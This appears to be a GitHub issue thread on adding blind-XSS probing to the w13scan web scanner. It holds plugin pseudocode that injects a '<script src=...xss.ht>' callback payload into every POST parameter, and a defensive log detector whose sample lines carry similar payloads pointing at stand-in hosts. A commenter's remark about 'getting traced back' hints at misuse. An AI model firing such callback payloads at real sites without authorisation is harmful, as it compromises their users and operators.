Open fngoo opened 3 years ago
PRs welcome.

https://github.com/hahwul/dalfox/blob/master/pkg/scanning/scan.go#L360 Passive blind-XSS scanning should work better than this kind of active approach.

In the XSS plugin, for POST requests only send the payload and do not process the result. Below is pseudocode appended to the XSS plugin; not sure whether it is feasible.
```python
# Assumes the w13scan plugin base classes and helpers (PluginBase, ResultObject,
# VulType, HTTPMETHOD, getParamsFromHtml, TOP_RISK_GET_PARAMS, random_str) are
# imported from the project, as in the existing XSS plugin.
import requests


class W13SCAN(PluginBase):
    name = 'XSS语义化探测插件'

    def init(self):
        self.result = ResultObject(self)
        self.result.init_info(self.requests.url, "XSS脚本注入", VulType.XSS)

    def audit(self):
        parse_params = set(getParamsFromHtml(self.response.text))
        resp = self.response.text
        params_data = {}
        self.init()
        iterdatas = []
        if self.requests.method == HTTPMETHOD.GET:
            parse_params = (parse_params | TOP_RISK_GET_PARAMS) - set(self.requests.params.keys())
            for key in parse_params:
                params_data[key] = random_str(6)
            params_data.update(self.requests.params)
            resp = requests.get(self.requests.netloc, params=params_data, headers=self.requests.headers).text
            iterdatas = self.generateItemdatas(params_data)
        elif self.requests.method == HTTPMETHOD.POST:
            parse_params = parse_params - set(self.requests.post_data.keys())
            for key in parse_params:
                params_data[key] = random_str(6)
            params_data.update(self.requests.post_data)
            resp = requests.post(self.requests.url, data=params_data, headers=self.requests.headers).text
            iterdatas = self.generateItemdatas(params_data)
            # blind xss: send the callback payload in every discovered POST
            # parameter and discard the response (blind_xss_arg is assumed to
            # be a command-line option the scanner does not have yet)
            if blind_xss_arg:
                for blind_key in parse_params:
                    params_data[blind_key] = '"><script src=https://xsshunterurlforexample.xss.ht></script>'
                params_data.update(self.requests.post_data)
                noresp = requests.post(self.requests.url, data=params_data, headers=self.requests.headers).text
            # end blind xss
```
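As an added example (not part of this issue or of w13scan), here is the detection-side counterpart of the fire-and-forget probe sketched above: a check a defender can run over logged POST bodies to flag parameters that carry a `<script src=...>` pointing at a host outside the application's own script allowlist, which is exactly the shape of a blind-XSS callback payload. The log line format, the field names, the allowlist and the sample lines are constructed for this example.

```python
"""Flag blind-XSS-style external script callbacks in logged POST bodies.
Constructed example: the log format and sample data are not from any real system."""
import re
from html import unescape
from urllib.parse import parse_qs, urlparse

# Hosts allowed to serve scripts to the application; anything else referenced
# from a request parameter is treated as an external callback (assumed list).
ALLOWED_SCRIPT_HOSTS = {"cdn.example.com"}

# Matches <script ... src=VALUE> with or without quotes, case-insensitively.
SCRIPT_SRC_RE = re.compile(r"<\s*script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def external_script_hosts(value, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return the hosts referenced by <script src=...> in one parameter value
    that are not on the allowlist. HTML entities are decoded first."""
    decoded = unescape(value)
    hosts = set()
    for src in SCRIPT_SRC_RE.findall(decoded):
        if src.startswith("//"):          # protocol-relative URL
            src = "https:" + src
        host = urlparse(src).hostname
        if host and host.lower() not in allowed:
            hosts.add(host.lower())
    return hosts


def scan_post_body(body):
    """Map each parameter name carrying an external script callback to the
    set of hosts it references. parse_qs undoes the percent-encoding."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            hosts = external_script_hosts(v)
            if hosts:
                findings.setdefault(name, set()).update(hosts)
    return findings


# Constructed log lines: "<client_ip> <method> <path> <urlencoded_body>".
SAMPLE_LOG = [
    '203.0.113.7 POST /comment text=hello+world&author=alice',
    '203.0.113.9 POST /comment text=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fattacker-callback.example%3E%3C%2Fscript%3E&author=bob',
    '198.51.100.4 POST /profile bio=%3Cscript%20src%3D%22https%3A%2F%2Fcdn.example.com%2Fapp.js%22%3E%3C%2Fscript%3E',
    '198.51.100.5 POST /search q=%3Cscript+src%3D%2F%2Fcb.example.net%2Fp.js%3E%3C%2Fscript%3E&q=normal',
]


def detect_blind_xss_probes(lines):
    """Return one alert per POST line whose body carries an external script callback."""
    alerts = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[1] != "POST":
            continue
        ip, _, path, body = parts
        findings = scan_post_body(body)
        if findings:
            alerts.append({"ip": ip, "path": path,
                           "params": {k: sorted(v) for k, v in findings.items()}})
    return alerts


if __name__ == "__main__":
    for alert in detect_blind_xss_probes(SAMPLE_LOG):
        print(alert)
```

The allowlist keeps the check from firing on the application's own `<script src>` usage (the `/profile` line above), and the protocol-relative case is normalised before the host is extracted so a `//host/x.js` payload is not missed.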
I have tried it this way; there is some success rate, but more often than not you just end up getting traced back..
-b, --blind string Add your blind xss (e.g -b xss.com)